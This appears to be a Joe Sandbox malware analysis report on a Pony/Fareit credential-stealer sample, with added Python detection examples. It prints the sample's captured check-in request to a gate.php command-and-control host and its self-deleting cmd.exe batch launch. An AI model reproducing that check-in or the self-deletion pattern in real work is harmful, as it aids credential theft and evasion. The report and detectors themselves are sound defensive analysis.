22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_C5+L5nUWmAu2SGi66U6B9shqlx92WoCwezm5sg3VK7SeiDeQs+RZoSbeC+Djmnf9RLrJjX6vMSCufCeRg4R/MA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                Aug 19, 2024 16:43:44.649307966 CEST  663                IN         Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWVlMWNmMDAtMjJkNy00MTljLWFkMGItOWRlZTc3NTZjY2IyIiwicGFnZV90aW1lIjoxNzI0MDc4Nj
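                The two sessions above are the sample's only HTTP activity: a GET to /gate.php carrying the Windows 98 / MSIE 5.0 User-Agent that Suricata rule 2014562 is named after, answered first by a 302 to a ww25. subdomain and then by a page with domain-parking markers (a parking_session cookie, an x-adblock-key header, "window.park" in the body, and a CNAME to bodis.com in the DNS answers). The check-in therefore reached a parked domain, not a live panel. The following Python is an added example and not part of the Joe Sandbox report: it parses request and response heads of this shape, flags a Pony-style check-in only when both hard-coded header values are present (treating the gate.php path and HTTP/1.0 as weak corroboration, since both are common in benign traffic), and separately recognises a parking-service reply. The rule body is not shown on this page, so using the Accept-Encoding value as a second fingerprint is this example's own assumption; the benign request is constructed.

```python
# Added example (not part of the Joe Sandbox report): classify captured HTTP
# request/response heads for the Pony check-in fingerprint and for the
# domain-parking reply recorded in sessions 0 and 1 above.
from dataclasses import dataclass

# Both values are copied from the captured request. The Suricata rule name
# ("... HTTP Library MSIE 5 Win98") refers to the User-Agent; using the
# Accept-Encoding value as a second fingerprint is this example's assumption,
# not a quote of the rule body, which the report does not include.
PONY_USER_AGENT = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
PONY_ACCEPT_ENCODING = "identity, *;q=0"


@dataclass
class HttpMessage:
    start_line: str          # request line or status line
    headers: dict[str, str]  # names lower-cased; a repeated header keeps the last value


def parse_http(raw: str) -> HttpMessage:
    """Parse a raw HTTP request or response head (headers only, body ignored)."""
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line terminates the head
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return HttpMessage(lines[0].strip(), headers)


def pony_indicators(req: HttpMessage) -> list[str]:
    """Pony-specific traits present in a request head, strongest first."""
    hits: list[str] = []
    parts = req.start_line.split()
    target = parts[1] if len(parts) >= 2 else ""
    version = parts[2] if len(parts) >= 3 else ""
    if req.headers.get("user-agent") == PONY_USER_AGENT:
        hits.append("ua")
    if req.headers.get("accept-encoding") == PONY_ACCEPT_ENCODING:
        hits.append("accept-encoding")
    if version == "HTTP/1.0" and req.headers.get("connection", "").lower() == "close":
        hits.append("http10-close")
    if target.split("?", 1)[0].endswith("/gate.php"):
        hits.append("gate.php")
    return hits


def is_pony_checkin(req: HttpMessage) -> bool:
    """Alert on the two hard-coded header values together. gate.php is a common
    script name in legitimate PHP apps and HTTP/1.0 is still used by old tooling,
    so neither adds confidence on its own."""
    hits = pony_indicators(req)
    return "ua" in hits and "accept-encoding" in hits


def looks_parked(resp: HttpMessage) -> bool:
    """Heuristic for a domain-parking reply instead of a live panel; both
    markers appear in the response of session 1 above."""
    cookie = resp.headers.get("set-cookie", "")
    return cookie.startswith("parking_session=") or "x-adblock-key" in resp.headers


# Request copied from session 0 of this report.
CAPTURED_REQUEST = (
    "GET /gate.php HTTP/1.0\r\n"
    "Host: dillion0mill.favcc1.com\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: identity, *;q=0\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n"
    "\r\n"
)

# Constructed: a current browser fetching a same-named script on an intranet host.
BENIGN_REQUEST = (
    "GET /gate.php?id=7 HTTP/1.1\r\n"
    "Host: intranet.example\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Connection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\r\n"
    "\r\n"
)

# Response head from session 1 of this report; the x-adblock-key value is
# shortened here because only the header's presence is used.
CAPTURED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "content-type: text/html; charset=utf-8\r\n"
    "x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb...\r\n"
    "set-cookie: parking_session=9ee1cf00-22d7-419c-ad0b-9dee7756ccb2; path=/\r\n"
    "connection: close\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, raw in (("session 0", CAPTURED_REQUEST), ("constructed", BENIGN_REQUEST)):
        req = parse_http(raw)
        print(f"{name}: {pony_indicators(req)} -> {'PONY' if is_pony_checkin(req) else 'clean'}")
    print("session 1 reply looks parked:", looks_parked(parse_http(CAPTURED_RESPONSE)))
```

                Run stand-alone, the captured request yields all four indicators and an alert, the constructed browser request yields only the gate.php path and stays clean, and the session 1 reply is classed as parked. In a real pipeline the same functions would be fed the reassembled heads from a proxy log or PCAP rather than the inline strings.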



                Target ID:0
                Start time:10:43:39
                Start date:19/08/2024
                Path:C:\Users\user\Desktop\AxgZVzUv8m.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\AxgZVzUv8m.exe"
                Imagebase:0x10000
                File size:509'952 bytes
                MD5 hash:0DC91D39870A081F44B8429DCFBC223F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:3
                Start time:10:43:39
                Start date:19/08/2024
                Path:C:\Users\user\Desktop\AxgZVzUv8m.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\AxgZVzUv8m.exe"
                Imagebase:0x860000
                File size:509'952 bytes
                MD5 hash:0DC91D39870A081F44B8429DCFBC223F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: pony, Description: Identify Pony, Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                • Rule: Fareit, Description: Fareit Payload, Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                Reputation:low
                Has exited:true

                Target ID:5
                Start time:10:43:45
                Start date:19/08/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7041625.bat" "C:\Users\user\Desktop\AxgZVzUv8m.exe" "
                Imagebase:0xa40000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:6
                Start time:10:43:45
                Start date:19/08/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6ee680000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false
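                Target ID 5 is the launch of the dropped self-deletion script that the signature list refers to: cmd.exe /c is handed a .bat in the user's AppData\Local\Temp together with the loader's own path, with the loader (Target ID 0/3) as its parent. The report does not show the script's contents, so a detection has to key on that launch pattern rather than on the del loop inside the batch file. The Python below is an added example and not part of the report: it evaluates process-creation events of a shape this example defines (Sysmon and EDR field names differ) and alerts only when a cmd /c batch script located in a Temp directory is passed the parent process's own image as an argument. The first event is taken from Target ID 5 above; the other two are constructed to show why either trait alone is not enough.

```python
# Added example (not part of the Joe Sandbox report): detect the Pony Loader
# self-deletion launch pattern in process-creation telemetry. The event shape
# below is this example's own; Sysmon / EDR field names differ.
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the creating process
    image: str          # full path of the created process
    command_line: str   # command line as recorded by the sensor


def cmdline_paths(command_line: str) -> list[str]:
    """Return the quoted arguments of a Windows command line.

    cmd.exe's /c ""script" "arg"" doubled-quote form, as recorded for
    Target ID 5, yields exactly the two inner paths.
    """
    return re.findall(r'"([^"]+)"', command_line)


def in_temp_dir(path: str) -> bool:
    """True for the per-user and system Temp directories."""
    p = path.lower()
    return "\\appdata\\local\\temp\\" in p or "\\windows\\temp\\" in p


def self_delete_indicators(ev: ProcessEvent) -> list[str]:
    """Traits of the launch that point at a loader deleting itself."""
    hits: list[str] = []
    if PureWindowsPath(ev.image).name.lower() != "cmd.exe":
        return hits
    if not re.search(r"(?i)(^|\s)/c(\s|$)", ev.command_line):
        return hits
    hits.append("cmd /c")
    paths = cmdline_paths(ev.command_line)
    scripts = [p for p in paths if PureWindowsPath(p).suffix.lower() in (".bat", ".cmd")]
    if any(in_temp_dir(s) for s in scripts):
        hits.append("batch script in Temp")
    parent_name = PureWindowsPath(ev.parent_image).name.lower()
    if any(PureWindowsPath(p).suffix.lower() == ".exe"
           and PureWindowsPath(p).name.lower() == parent_name for p in paths):
        hits.append("parent image passed as argument")
    return hits


def is_self_delete_script(ev: ProcessEvent) -> bool:
    """Alert only when the Temp-resident script receives the parent's own
    executable: either trait alone is common in installers and build tooling."""
    hits = self_delete_indicators(ev)
    return "batch script in Temp" in hits and "parent image passed as argument" in hits


EVENTS = [
    # Target ID 5 of this report, parent taken from Target ID 0/3.
    ProcessEvent(
        parent_image=r"C:\Users\user\Desktop\AxgZVzUv8m.exe",
        image=r"C:\Windows\SysWOW64\cmd.exe",
        command_line=r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7041625.bat" "C:\Users\user\Desktop\AxgZVzUv8m.exe" "',
    ),
    # Constructed: a user running a build script from the desktop.
    ProcessEvent(
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\cmd.exe",
        command_line=r'C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\build.bat"',
    ),
    # Constructed: an installer running a Temp script against a different binary.
    ProcessEvent(
        parent_image=r"C:\Users\user\Downloads\setup.exe",
        image=r"C:\Windows\System32\cmd.exe",
        command_line=r'C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\post_install.bat" "C:\Program Files\Tool\tool.exe"',
    ),
]

if __name__ == "__main__":
    for ev in EVENTS:
        verdict = "ALERT" if is_self_delete_script(ev) else "ok"
        print(f"{verdict:5} {PureWindowsPath(ev.parent_image).name} -> {ev.command_line}")
        print("      ", self_delete_indicators(ev))
```

                Only the first event alerts. The build-script event has neither trait, and the installer event has a Temp-resident script but hands it a different binary, which is why the rule requires the parent's own image to appear on the command line before firing.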


                  Execution Graph

                  Execution Coverage:39%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:4.3%
                  Total number of Nodes:69
                  Total number of Limit Nodes:3
                  Execution graph (function entry -> API call site -> return block):
                  • 6750c72 -> LookupPrivilegeValueW @ 6750c9b -> 6750cc2
                  • 6750032 -> VerLanguageNameW @ 6750082 -> 6750090
                  • 6750df2 -> AdjustTokenPrivileges @ 6750e21 -> 6750e43
                  • 67506b2 -> ReadFile @ 67506e7 -> 6750719
                  • 67502b2 -> (675031f) -> FindCloseChangeNotification @ 67502de -> 67502ec
                  • 675107e -> TerminateProcess @ 67510b3 -> 67510dc
                  • 69b122 -> LoadLibraryShim @ 69b14e -> 69b17c
                  • 67508fa -> SetFileAttributesW @ 6750923 -> 675093f
                  • 69bda6 -> GetFileVersionInfoW @ 69bdd5 -> 69bdf8
                  • 69a23a -> GetModuleHandleW @ 69a260 -> 69a283
                  • 69b8fa -> (69b95a) -> FreeLibrary @ 69b926 -> 69b93b
                  • 675032d -> CreateFileW @ 675035e -> 67503e5
                  • 67504ef -> GetFileType @ 6750522 -> 6750584
                  • 69bcf6 -> GetFileVersionInfoSizeW @ 69bd1f -> 69bd3b
                  • 69a98a -> RegOpenKeyExW @ 69a9ba -> 69aa48
                  • 69b84e -> LoadLibraryW @ 69b874 -> 69b890
                  • 69a4ce -> (69a544) -> DuplicateHandle @ 69a50c -> 69a51a
                  • 6750692 -> ReadFile @ 67506b2 -> 6750719
                  • 69aa81 -> RegQueryValueExW @ 69aac2 -> 69ab4b
                  • 675035e -> CreateFileW @ 6750396 -> 67503e5
                  • 6751040 -> TerminateProcess @ 675107e -> 67510dc
                  • 6750ec2 -> K32EnumProcesses @ 6750eee -> 6750f0a
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4$:@Fl$P-l
                  • API String ID: 0-3948865390
                  • Opcode ID: acf50d592d88e2b7d86e1418c2425747320590a10c45dd06c4a3b275e6286904
                  • Instruction ID: cdbcd1ccfc396a9a70296118940b045b428127642c7879742840800c64156eba
                  • Opcode Fuzzy Hash: acf50d592d88e2b7d86e1418c2425747320590a10c45dd06c4a3b275e6286904
                  • Instruction Fuzzy Hash: FAA2E030B002148FDB24EB34C864BAEB7B6AFC5308F558569D40A9B7A6DF319C45CB95

                  Control-flow Graph

                  Basic blocks: 6750df2-6750e1f, 6750e21, 6750e24-6750e33, 6750e35-6750e3d (AdjustTokenPrivileges), 6750e43-6750e55, 6750e57-6750e73, 6750e76-6750e7b, 6750e7d-6750e82
                  APIs
                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 06750E3B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: AdjustPrivilegesToken
                  • String ID:
                  • API String ID: 2874748243-0
                  • Opcode ID: 15c254d6634ba34ce50c93976aa52fe349dd8593d34f7deea14de697c165ef4e
                  • Instruction ID: b4a911c2a2248e8c2a0bacfc244e7089773cf1becb7b838bad8ccaf4bf0f6bd0
                  • Opcode Fuzzy Hash: 15c254d6634ba34ce50c93976aa52fe349dd8593d34f7deea14de697c165ef4e
                  • Instruction Fuzzy Hash: C911A0715046449FEB20CF55D884B66FBE4EF04720F08C8AEDE458B661D371E414CF62
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID: P-l
                  • API String ID: 0-2176228525
                  • Opcode ID: 4517d205f1257c00b3730b66fdea92e000176fed79e755000038e9e2e3b03d30
                  • Instruction ID: b1338a7ab685149205e06dec5b19a3a595f95e98ebcf586ce660c1d21a67348a
                  • Opcode Fuzzy Hash: 4517d205f1257c00b3730b66fdea92e000176fed79e755000038e9e2e3b03d30
                  • Instruction Fuzzy Hash: D0425E34B10214CFDB24EB74C868BAEB7B2AF89304F548569D41A9B7A6DF319C85CF44

                  Control-flow Graph

                  Basic blocks: 675032d-67503b6, 67503b8, 67503bb-67503c7, 67503c9, 67503cc-67503d5, 67503d7-67503fb (CreateFileW), 67503fd-6750423, 6750426-675042b, 675042d-6750432
                  APIs
                  • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 067503DD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 49d0a78d299d97b52c1e4773510e058984337e1478845ebd0edc5307a5d5db78
                  • Instruction ID: ff2ea137a8ff38668bcf41282e5f56ed78bbc3904c6a7e68f4a74df5b6632c69
                  • Opcode Fuzzy Hash: 49d0a78d299d97b52c1e4773510e058984337e1478845ebd0edc5307a5d5db78
                  • Instruction Fuzzy Hash: 72317E715093806FE722CB65DC44FA2BFF8EF06324F09849EE9858B252D365E909CB71

                  Control-flow Graph

                  Basic blocks: 69a98a-69aa15, 69aa17, 69aa1a-69aa31, 69aa33-69aa46 (RegOpenKeyExW), 69aa48-69aa70, 69aa73-69aa78, 69aa7a-69aa7f
                  APIs
                  • RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 0069AA39
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: 29e80eed6cf2effd43db33bc434ad3309e45621c2eab3488c602dfbfee594d53
                  • Instruction ID: 9029e1dfb2eec09f33f9234baa9a6f4f67851f6a428898d7c2e616ebd3744cd3
                  • Opcode Fuzzy Hash: 29e80eed6cf2effd43db33bc434ad3309e45621c2eab3488c602dfbfee594d53
                  • Instruction Fuzzy Hash: 99318471508384AFE7228B61CC45FA7BFFCEF06610F09449AE9858B552D264E909CBB1

                  Control-flow Graph

                  Basic blocks: 69aa81-69aaff, 69ab01, 69ab04-69ab0d, 69ab0f, 69ab12-69ab18, 69ab1a, 69ab1d-69ab34, 69ab36-69ab49 (RegQueryValueExW), 69ab4b-69ab68, 69ab6b-69ab70, 69ab72-69ab77
                  APIs
                  • RegQueryValueExW.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 0069AB3C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: QueryValue
                  • String ID:
                  • API String ID: 3660427363-0
                  • Opcode ID: 50f07aa750eba339abe0d22d3fc8931b9fc728f69855a86ebcd1dfc3cbaf9fa2
                  • Instruction ID: 512835007115a30366fcf5a663fc944224ffdc1f3302cd4f7ce0725b79cd253a
                  • Opcode Fuzzy Hash: 50f07aa750eba339abe0d22d3fc8931b9fc728f69855a86ebcd1dfc3cbaf9fa2
                  • Instruction Fuzzy Hash: D631A4751097845FEB22CB61CC44FA2BFFCEF06714F08849AE945CB652D264E909CB65

                  Control-flow Graph

                  Basic blocks: 6751040-67510cc, 67510ce-67510ee (TerminateProcess), 67510f0-6751116, 6751117-675111c, 675111e-6751123
                  APIs
                  • TerminateProcess.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 067510D4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: ProcessTerminate
                  • String ID:
                  • API String ID: 560597551-0
                  • Opcode ID: ceaca2da482e4e2f0a85d9cca0b3ab253c2bfd05995b3902d715856a30594d65
                  • Instruction ID: 50a8c6dd8c26dcf35dce5cfec083f1fb020925d97cd85bec7a3a86c9623a2227
                  • Opcode Fuzzy Hash: ceaca2da482e4e2f0a85d9cca0b3ab253c2bfd05995b3902d715856a30594d65
                  • Instruction Fuzzy Hash: 2A2107755097806FE7128B61DC45BA6BFB8EF46324F0980DBE984CF193D264A909C771

                  Control-flow Graph

                  Basic blocks: 675035e-67503b6, 67503b8, 67503bb-67503c7, 67503c9, 67503cc-67503d5, 67503d7-67503df (CreateFileW), 67503e5-67503fb, 67503fd-6750423, 6750426-675042b, 675042d-6750432
                  APIs
                  • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 067503DD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 6e5de9acf721bfd32c1fabb93c9ff34a65c647c116efd8aa8e00ecc5e2fe24f9
                  • Instruction ID: 359a4d8cb8afb52da9cea893266cc4a18e99a9c955ee4e7c1ae8e3d7a59030c9
                  • Opcode Fuzzy Hash: 6e5de9acf721bfd32c1fabb93c9ff34a65c647c116efd8aa8e00ecc5e2fe24f9
                  • Instruction Fuzzy Hash: 90216B71504600AFEB20CF65DD85FA6BBE8EF09724F0884AEEA458B651D3B5E404CA71

                  Control-flow Graph

                  Basic blocks: 69a9ba-69aa15, 69aa17, 69aa1a-69aa31, 69aa33-69aa46 (RegOpenKeyExW), 69aa48-69aa70, 69aa73-69aa78, 69aa7a-69aa7f
                  APIs
                  • RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 0069AA39
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: 50e7bc9d038e86b6338f4536976b6eedbb8799be824223e4691e80a48d66afdf
                  • Instruction ID: 8b25d8b6c65576c4599fdabbbcc4e087a13eb2b02e9226e472c5e27460da4341
                  • Opcode Fuzzy Hash: 50e7bc9d038e86b6338f4536976b6eedbb8799be824223e4691e80a48d66afdf
                  • Instruction Fuzzy Hash: A1219D72504204AFFB209A51DD44FABFBECEF08724F04845AEA458B651D764E908CAB6

                  Control-flow Graph

                  Basic blocks: 67504ef-675056d, 675056f-6750582 (GetFileType), 6750584-67505a1, 67505a2-67505a7, 67505a9-67505ae
                  APIs
                  • GetFileType.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 06750575
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FileType
                  • String ID:
                  • API String ID: 3081899298-0
                  • Opcode ID: f67c2d3f9672b78542ddafe1c4aa4964a939eb1ed16cd84acd7e8c01951e6253
                  • Instruction ID: 8440f33e7d189cf8432e600eaf28f8861ff144a30aa25bdcecd3e1914660d043
                  • Opcode Fuzzy Hash: f67c2d3f9672b78542ddafe1c4aa4964a939eb1ed16cd84acd7e8c01951e6253
                  • Instruction Fuzzy Hash: 6321D2B54097846FE7228B11DC45FB2BFB8EF46724F0980DBE9848F193D268A909C775

                  Control-flow Graph

                  Basic blocks: 6750692-6750709, 675070b-675072b (ReadFile), 675072d-675074a, 675074d-6750752, 6750754-6750759
                  APIs
                  • ReadFile.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 06750711
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: 54e2bdf3e6082b9d4ed800e75a67eadbbbe00fa9fbe1f64bc0f22ac3c31782cf
                  • Instruction ID: 2cacdb0d6f58ea280d3693e59d4acb49784351a3a669646f53b39c3f035b652e
                  • Opcode Fuzzy Hash: 54e2bdf3e6082b9d4ed800e75a67eadbbbe00fa9fbe1f64bc0f22ac3c31782cf
                  • Instruction Fuzzy Hash: 4221CF71409380AFEB22CF51CC44FA7BFB8EF45320F08849AEA848B152C264A508CBB5

                  Control-flow Graph

                  Basic blocks: 69aac2-69aaff, 69ab01, 69ab04-69ab0d, 69ab0f, 69ab12-69ab18, 69ab1a, 69ab1d-69ab34, 69ab36-69ab49 (RegQueryValueExW), 69ab4b-69ab68, 69ab6b-69ab70, 69ab72-69ab77
                  APIs
                  • RegQueryValueExW.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 0069AB3C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: QueryValue
                  • String ID:
                  • API String ID: 3660427363-0
                  • Opcode ID: 2c5d7e25a94b41b77635c1cd07b05ecf0dd5dbf44ab15f56431af763782ecd1a
                  • Instruction ID: d12e04169eddc0dbb0f256bf09d99870f4f0a2bb5ac913510980759167dc4b52
                  • Instruction Fuzzy Hash: 7821CD75200604AFEB20CF51CC84FA7F7EDEF04724F0884AAEA45CB655D360E808CAB2

                  Control-flow Graph (image not reproduced; basic blocks 675107e-6751123, calls TerminateProcess)
                  APIs
                  • TerminateProcess.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 067510D4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: ProcessTerminate
                  • String ID:
                  • API String ID: 560597551-0
                  • Opcode ID: 7ec3ba6f4e7d6af53a88692759d4045eaef4224be860d5f84ec9619bb623c217
                  • Instruction ID: b0430db39802e0d2337e89072e380e2dea9b72eb739053289b1c979306757c20
                  • Instruction Fuzzy Hash: E811E375504244AFFB20CF55DC85BB6FBE8EF44624F0584AAEE05CF241D3B4A504CAB5

                  Control-flow Graph (image not reproduced; basic blocks 67506b2-6750759, calls ReadFile)
                  APIs
                  • ReadFile.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 06750711
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: 95ab6a8036f1a283a23228521f7d6aad60e28a112df7ffda877d0dc1e5bd2692
                  • Instruction ID: 274a63abf459b406e8682258317740acec3b40d76d629d79c7d28cbbcfc93664
                  • Instruction Fuzzy Hash: BB11BC75404604AFFB21CF51DC84FA6FBA8EF44724F0488AAEE458B251D375A5088FB6

                  Control-flow Graph (image not reproduced; basic blocks 6750c72-6750d01, calls LookupPrivilegeValueW)
                  APIs
                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 06750CBA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: LookupPrivilegeValue
                  • String ID:
                  • API String ID: 3899507212-0
                  • Opcode ID: 8cac8f278e3c6d66f02cad8e3cda0180a503858c9e79427c3f721c81f0deec6d
